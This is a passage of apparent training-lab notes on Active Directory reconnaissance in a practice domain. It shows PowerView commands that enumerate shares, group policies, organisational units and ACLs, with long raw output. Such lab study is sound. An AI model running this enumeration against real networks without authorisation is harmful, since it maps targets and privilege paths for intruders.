LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Invoke-LDAPQuery] filter string: (&(samAccountType=805306369))
VERBOSE: [Get-DomainComputer] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Find-DomainShare] TargetComputers length: 28
VERBOSE: [Find-DomainShare] Using threading with threads: 20
VERBOSE: [New-ThreadedFunction] Total number of hosts: 28
VERBOSE: [New-ThreadedFunction] Total number of threads/partitions: 20
Name Type Remark ComputerName
Name Type Remark ComputerName

Name Type Remark ComputerName

VERBOSE: [New-ThreadedFunction] Threads executing

Name Type Remark ComputerName

---- ---- ------ ------------
ADMIN$ 2147483648 Remote Admin dcorp-std170.dollarcorp.moneycorp.local
C$ 2147483648 Default share dcorp-std170.dollarcorp.moneycorp.local
IPC$ 2147483651 Remote IPC dcorp-std170.dollarcorp.moneycorp.local
shared 0 dcorp-std170.dollarcorp.moneycorp.local
Users 0 dcorp-std170.dollarcorp.moneycorp.local
VERBOSE: [New-ThreadedFunction] Waiting 100 seconds for final cleanup...
VERBOSE: [New-ThreadedFunction] all threads completed

Getting File servers

PS C:\Users\student163> Get-NetFileServer

GPO Enumeration
Using PowerView
Get List of GPOs in the current domain
PS C:\Users\student163> Get-DomainGPO

flags : 0
systemflags : -1946157056
displayname : Default Domain Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-
00C04FB94F17}][{827D319E-6EA
C-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-
00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00
C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
whenchanged : 11/12/2022 6:07:26 AM
versionnumber : 3
name : {31B2F340-016D-11D2-945F-00C04FB984F9}
cn : {31B2F340-016D-11D2-945F-00C04FB984F9}
usnchanged : 12893
dscorepropagationdata : {11/12/2022 5:59:41 AM, 1/1/1601 12:00:00 AM}
objectguid : 7fd00875-441d-44d8-a325-19bee9b8800d
iscriticalsystemobject : True
gpcfilesyspath :
\\dollarcorp.moneycorp.local\sysvol\dollarcorp.moneycorp.local\Policies\{31B2F340-016D-11D2-
945F-00C04FB984F9}
distinguishedname : CN={31B2F340-016D-11D2-945F-
00C04FB984F9},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,D
C=local
whencreated : 11/12/2022 5:59:00 AM
showinadvancedviewonly : True
usncreated : 7789
gpcfunctionalityversion : 2
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-
Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

flags : 0
systemflags : -1946157056
displayname : Default Domain Controllers Policy
gpcmachineextensionnames : [{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-
00A0C90F574B}]
whenchanged : 11/12/2022 5:59:00 AM
versionnumber : 1
name : {6AC1786C-016F-11D2-945F-00C04fB984F9}
cn : {6AC1786C-016F-11D2-945F-00C04fB984F9}
usnchanged : 7792
dscorepropagationdata : {11/12/2022 5:59:41 AM, 1/1/1601 12:00:00 AM}
objectguid : ac098e0e-a9a2-46e1-828d-b08c9ac75593
iscriticalsystemobject : True
gpcfilesyspath :
\\dollarcorp.moneycorp.local\sysvol\dollarcorp.moneycorp.local\Policies\{6AC1786C-016F-11D2-
945F-00C04fB984F9}
distinguishedname : CN={6AC1786C-016F-11D2-945F-
00C04fB984F9},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,D
C=local
whencreated : 11/12/2022 5:59:00 AM
showinadvancedviewonly : True
usncreated : 7792
gpcfunctionalityversion : 2
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-
Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

flags : 0
displayname : Applocker
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{62C1845D-C4A6-4ACB-BBB0-
C895FD090385}{D02B1F72-3407-
48AE-BA88-E8213C6761F1}][{827D319E-6EAC-11D2-A4EA-
00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0
C90F574B}]
whenchanged : 11/15/2022 5:50:16 AM
versionnumber : 15
name : {0D1CC23D-1F20-4EEE-AF64-D99597AE2A6E}
cn : {0D1CC23D-1F20-4EEE-AF64-D99597AE2A6E}
usnchanged : 45979
dscorepropagationdata : 1/1/1601 12:00:00 AM
objectguid : bcf4770b-b560-468b-88cb-6beaeb6793f9
gpcfilesyspath :
\\dollarcorp.moneycorp.local\SysVol\dollarcorp.moneycorp.local\Policies\{0D1CC23D-1F20-4EEE-
AF64-D99597AE2A6E}
distinguishedname : CN={0D1CC23D-1F20-4EEE-AF64-
D99597AE2A6E},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,D
C=local
whencreated : 11/15/2022 4:21:20 AM
showinadvancedviewonly : True
usncreated : 45231
gpcfunctionalityversion : 2
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-
Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

flags : 0
displayname : Servers
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-
E8213C6761F1}][{827D319E-6EA
C-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 11/15/2022 5:49:33 AM
versionnumber : 6
name : {308279C1-FFB6-4D52-948C-660B07AC77FB}
cn : {308279C1-FFB6-4D52-948C-660B07AC77FB}
usnchanged : 45969
dscorepropagationdata : 1/1/1601 12:00:00 AM
objectguid : 5e0b30e9-2965-4566-b89d-a34c7167446c
gpcfilesyspath :
\\dollarcorp.moneycorp.local\SysVol\dollarcorp.moneycorp.local\Policies\{308279C1-FFB6-4D52-
948C-660B07AC77FB}
distinguishedname : CN={308279C1-FFB6-4D52-948C-
660B07AC77FB},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,D
C=local
whencreated : 11/15/2022 5:45:09 AM
showinadvancedviewonly : True
usncreated : 45910
gpcfunctionalityversion : 2
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-
Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

flags : 0
displayname : Students
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-
E8213C6761F1}][{827D319E-6EA
C-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 11/15/2022 5:48:32 AM
versionnumber : 6
name : {7478F170-6A0C-490C-B355-9E4618BC785D}
cn : {7478F170-6A0C-490C-B355-9E4618BC785D}
usnchanged : 45959
dscorepropagationdata : 1/1/1601 12:00:00 AM
objectguid : 0076f619-ffef-4488-bfdb-1fc028c5cb14
gpcfilesyspath :
\\dollarcorp.moneycorp.local\SysVol\dollarcorp.moneycorp.local\Policies\{7478F170-6A0C-490C-
B355-9E4618BC785D}
distinguishedname : CN={7478F170-6A0C-490C-B355-
9E4618BC785D},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,D
C=local
whencreated : 11/15/2022 5:46:19 AM
showinadvancedviewonly : True
usncreated : 45927
gpcfunctionalityversion : 2
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-
Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

Getting the list of GPOs applied on a computer

PS C:\Users\student163> Get-DomainGPO -ComputerIdentity dcorp-std163
Exception calling "FindAll" with "0" argument(s): "There is no such object on the server.
"
At C:\Ad\Tools\PowerView.ps1:10201 char:20
+ else { $Results = $SiteSearcher.FindAll() }
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : DirectoryServicesCOMException

flags : 0
displayname : Students
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-
E8213C6761F1}][{827D319E-6EA
C-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 11/15/2022 5:48:32 AM
versionnumber : 6
name : {7478F170-6A0C-490C-B355-9E4618BC785D}
cn : {7478F170-6A0C-490C-B355-9E4618BC785D}
usnchanged : 45959
dscorepropagationdata : 1/1/1601 12:00:00 AM
objectguid : 0076f619-ffef-4488-bfdb-1fc028c5cb14
gpcfilesyspath :
\\dollarcorp.moneycorp.local\SysVol\dollarcorp.moneycorp.local\Policies\{7478F170-6A0C-490C-
B355-9E4618BC785D}
distinguishedname : CN={7478F170-6A0C-490C-B355-
9E4618BC785D},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,D
C=local
whencreated : 11/15/2022 5:46:19 AM
showinadvancedviewonly : True
usncreated : 45927
gpcfunctionalityversion : 2
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-
Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

flags : 0
systemflags : -1946157056
displayname : Default Domain Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-
00C04FB94F17}][{827D319E-6EA
C-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-
00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00
C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
whenchanged : 11/12/2022 6:07:26 AM
versionnumber : 3
name : {31B2F340-016D-11D2-945F-00C04FB984F9}
cn : {31B2F340-016D-11D2-945F-00C04FB984F9}
usnchanged : 12893
dscorepropagationdata : {11/12/2022 5:59:41 AM, 1/1/1601 12:00:00 AM}
objectguid : 7fd00875-441d-44d8-a325-19bee9b8800d
iscriticalsystemobject : True
gpcfilesyspath :
\\dollarcorp.moneycorp.local\sysvol\dollarcorp.moneycorp.local\Policies\{31B2F340-016D-11D2-
945F-00C04FB984F9}
distinguishedname : CN={31B2F340-016D-11D2-945F-
00C04FB984F9},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,D
C=local
whencreated : 11/12/2022 5:59:00 AM
showinadvancedviewonly : True
usncreated : 7789
gpcfunctionalityversion : 2
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-
Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
Getting GPO(s) which use Restricted Users or groups.xml for interesting users
PS C:\Users\student163> Get-DomainGPOLocalGroup

Getting users who are in a local group on a machine using GPO

PS C:\Users\student163> Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity dcorp-
dc.dollarcorp.moneycorp.local

Getting Organizational Units in a domain

PS C:\Users\student163> Get-DomainOU

description : Default container for domain controllers

systemflags : -1946157056
iscriticalsystemobject : True
gplink : [LDAP://CN={6AC1786C-016F-11D2-945F-
00C04fB984F9},CN=Policies,CN=System,DC=dollarcorp,DC=money
corp,DC=local;0]
whenchanged : 11/12/2022 5:59:00 AM
objectclass : {top, organizationalUnit}
showinadvancedviewonly : False
usnchanged : 7921
dscorepropagationdata : {11/15/2022 3:49:24 AM, 11/12/2022 5:59:41 AM, 1/1/1601 12:04:16 AM}
name : Domain Controllers
distinguishedname : OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
ou : Domain Controllers
usncreated : 7921
whencreated : 11/12/2022 5:59:00 AM
instancetype : 4
objectguid : 802da67f-f1f8-40a7-9d13-7e76ccb25e39
objectcategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

usncreated : 44996
displayname : StudentMachines
gplink : [LDAP://cn={7478F170-6A0C-490C-B355-
9E4618BC785D},cn=policies,cn=system,DC=dollarcorp,DC=moneyc
orp,DC=local;0]
whenchanged : 11/15/2022 5:46:19 AM
objectclass : {top, organizationalUnit}
usnchanged : 45933
dscorepropagationdata : {11/15/2022 3:49:24 AM, 11/15/2022 3:49:24 AM, 1/1/1601 12:00:00 AM}
name : StudentMachines
distinguishedname : OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
ou : StudentMachines
whencreated : 11/15/2022 3:49:24 AM
instancetype : 4
objectguid : 1c7cd8cb-d8bb-412f-9d76-9cff8afa021f
objectcategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

usncreated : 45190
name : Applocked
gplink : [LDAP://cn={0D1CC23D-1F20-4EEE-AF64-
D99597AE2A6E},cn=policies,cn=system,DC=dollarcorp,DC=moneyc
orp,DC=local;0]
whenchanged : 11/15/2022 4:21:20 AM
objectclass : {top, organizationalUnit}
usnchanged : 45237
dscorepropagationdata : {11/15/2022 4:16:38 AM, 1/1/1601 12:00:00 AM}
distinguishedname : OU=Applocked,DC=dollarcorp,DC=moneycorp,DC=local
ou : Applocked
whencreated : 11/15/2022 4:16:38 AM
instancetype : 4
objectguid : e33cfcdb-8c09-4a51-a0bf-c67815e72615
objectcategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

usncreated : 45196
name : Servers
gplink : [LDAP://cn={308279C1-FFB6-4D52-948C-
660B07AC77FB},cn=policies,cn=system,DC=dollarcorp,DC=moneyc
orp,DC=local;0]
whenchanged : 11/15/2022 5:45:10 AM
objectclass : {top, organizationalUnit}
usnchanged : 45916
dscorepropagationdata : {11/15/2022 4:17:04 AM, 1/1/1601 12:00:00 AM}
distinguishedname : OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
ou : Servers
whencreated : 11/15/2022 4:17:04 AM
instancetype : 4
objectguid : f49a5fa1-0296-4e75-9c2d-c68c3b872d15
objectcategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

Getting the details of the GPO applied on an OU

We need the get the details of the GPO applied on an OU using the Get-DomainOU. From the gplink
attribute, we need to obtain the unique ID of the GPO and then use the Get-DomainGPO cmdlet to get
the name of the GPO.
PS C:\Users\student163> Get-DomainOU

description : Default container for domain controllers

systemflags : -1946157056
iscriticalsystemobject : True
gplink : [LDAP://CN={6AC1786C-016F-11D2-945F-
00C04fB984F9},CN=Policies,CN=System,DC=dollarcorp,DC=money
corp,DC=local;0]
whenchanged : 11/12/2022 5:59:00 AM
objectclass : {top, organizationalUnit}
showinadvancedviewonly : False
usnchanged : 7921
dscorepropagationdata : {11/15/2022 3:49:24 AM, 11/12/2022 5:59:41 AM, 1/1/1601 12:04:16 AM}
name : Domain Controllers
distinguishedname : OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
ou : Domain Controllers
usncreated : 7921
whencreated : 11/12/2022 5:59:00 AM
instancetype : 4
objectguid : 802da67f-f1f8-40a7-9d13-7e76ccb25e39
objectcategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

usncreated : 44996
displayname : StudentMachines
gplink : [LDAP://cn={7478F170-6A0C-490C-B355-
9E4618BC785D},cn=policies,cn=system,DC=dollarcorp,DC=moneyc
orp,DC=local;0]
whenchanged : 11/15/2022 5:46:19 AM
objectclass : {top, organizationalUnit}
usnchanged : 45933
dscorepropagationdata : {11/15/2022 3:49:24 AM, 11/15/2022 3:49:24 AM, 1/1/1601 12:00:00 AM}
name : StudentMachines
distinguishedname : OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
ou : StudentMachines
whencreated : 11/15/2022 3:49:24 AM
instancetype : 4
objectguid : 1c7cd8cb-d8bb-412f-9d76-9cff8afa021f
objectcategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

usncreated : 45190
name : Applocked
gplink : [LDAP://cn={0D1CC23D-1F20-4EEE-AF64-
D99597AE2A6E},cn=policies,cn=system,DC=dollarcorp,DC=moneyc
orp,DC=local;0]
whenchanged : 11/15/2022 4:21:20 AM
objectclass : {top, organizationalUnit}
usnchanged : 45237
dscorepropagationdata : {11/15/2022 4:16:38 AM, 1/1/1601 12:00:00 AM}
distinguishedname : OU=Applocked,DC=dollarcorp,DC=moneycorp,DC=local
ou : Applocked
whencreated : 11/15/2022 4:16:38 AM
instancetype : 4
objectguid : e33cfcdb-8c09-4a51-a0bf-c67815e72615
objectcategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

usncreated : 45196
name : Servers
gplink : [LDAP://cn={308279C1-FFB6-4D52-948C-
660B07AC77FB},cn=policies,cn=system,DC=dollarcorp,DC=moneyc
orp,DC=local;0]
whenchanged : 11/15/2022 5:45:10 AM
objectclass : {top, organizationalUnit}
usnchanged : 45916
dscorepropagationdata : {11/15/2022 4:17:04 AM, 1/1/1601 12:00:00 AM}
distinguishedname : OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
ou : Servers
whencreated : 11/15/2022 4:17:04 AM
instancetype : 4
objectguid : f49a5fa1-0296-4e75-9c2d-c68c3b872d15
objectcategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

PS C:\Users\student163> Get-DomainGPO -Name '{308279C1-FFB6-4D52-948C-660B07AC77FB}'

flags : 0
displayname : Servers
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-
E8213C6761F1}][{827D319E-6EA
C-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 11/15/2022 5:49:33 AM
versionnumber : 6
name : {308279C1-FFB6-4D52-948C-660B07AC77FB}
cn : {308279C1-FFB6-4D52-948C-660B07AC77FB}
usnchanged : 45969
dscorepropagationdata : 1/1/1601 12:00:00 AM
objectguid : 5e0b30e9-2965-4566-b89d-a34c7167446c
gpcfilesyspath :
\\dollarcorp.moneycorp.local\SysVol\dollarcorp.moneycorp.local\Policies\{308279C1-FFB6-4D52-
948C-660B07AC77FB}
distinguishedname : CN={308279C1-FFB6-4D52-948C-
660B07AC77FB},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,D
C=local
whencreated : 11/15/2022 5:45:09 AM
showinadvancedviewonly : True
usncreated : 45910
gpcfunctionalityversion : 2
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-
Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

ACL Enumeration
Access Control Model
Enables control on the ability of a process to access objects and other resources in Active Directory based
on:
• Access Tokens - Security context of a process - identity and privileges of the user
• Security Descriptors - SID of the owner, Discretionary ACL (DACL) and system ACL (SACL)
Access Control List (ACL):
• It is a list of Access Control Entries (ACE). ACE corresponds to individual permission or audit access.
Who has permissions and what can be done.
Two types:
• DACL - Defines the permissions a user or a group has on an object
• SACL - Logs success and failure audit messages when an object is accessed

Using Powerview
Getting the ACLs associated with a specified object
PS C:\Users\student163> Get-DomainObjectAcl -SamAccountName student163 -ResolveGUIDs

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : User-Change-Password
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : User-Change-Password
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-1-0
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Account-Restrictions
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-553
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Logon
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-553
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Membership
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-553
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : RAS-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-553
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : X509-Cert
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-517
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Token-Groups-Global-And-Universal
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-560
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Terminal-Server
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-561
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Terminal-Server-License-Server
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-561
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : Send-As
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : Receive-As
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : General-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Public-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Personal-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Web-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Personal-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Email-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Web-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
